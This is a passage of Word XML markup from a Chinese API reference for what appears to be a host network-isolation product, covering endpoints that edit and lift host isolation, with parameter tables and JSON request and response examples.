          </w:tcPr>
          <w:p w14:paraId="643049CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DBD5874" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="276FCD26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="071DE9E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21A2CDC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63F7626F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="248825C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="修改隔离接口"/>
      <w:bookmarkEnd w:id="217"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>修改隔离接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D0008" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196FF1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/segmentation/edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5A498"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6"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3835"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5068DAC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14849BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D41AE6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BCD7279" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23AD74DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="20BE984A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="619E3A11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E269158" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78A29769" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10978B10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71F14982" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE5208E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="531EC0F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DDE050B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2974691D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A9A4F65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="509E0779" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5991818D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E23DAD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008F0AB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76F0B70D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CE48B6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>portList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C54FEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A97A378" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4666F5CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="007A10B9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BAB580D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475D949C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1AECC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FF977E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65E02BF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6403D416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark":"123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "direction":"out",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ipList":["192.168.1.100","172.16.2.187"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "portList":["80","81","82"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC3320" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D721203" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29F08E"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3663B93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FFE64E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D71F2B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67795FF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FD4216B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC519B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66787E29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378CCE53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52119B14" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7812C27C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02BC0D3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03543F6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="254676B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08772961" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E7B1546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32EC109F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B44DA85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="解除隔离接口"/>
      <w:bookmarkEnd w:id="218"/>
      <w:r>
        <w:t>解除隔离接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7FCED9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F2CF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/ms-srv/api/segmentation/del</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC6979"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630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="42D63D8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7C7492F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="534F5E39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26DE9BDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="450DF0A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2417C821" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3003AF2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1864153C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="528F6800" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6295B398" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F6561C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F649CDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E252AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228A9DE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD76AD9"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="67D3277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52AE3D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0972B2BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103F4F55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="645C0E49" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A9E449F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14BB3E50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E523F87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71D9C7F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A9CE441" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FED745F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4396236C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="298082D9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD83CFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A8D162" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B759922" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42287BF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="删除隔离接口"/>
      <w:bookmarkEnd w:id="219"/>
      <w:r>
        <w:t>删除隔离接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628E1B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966FBCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
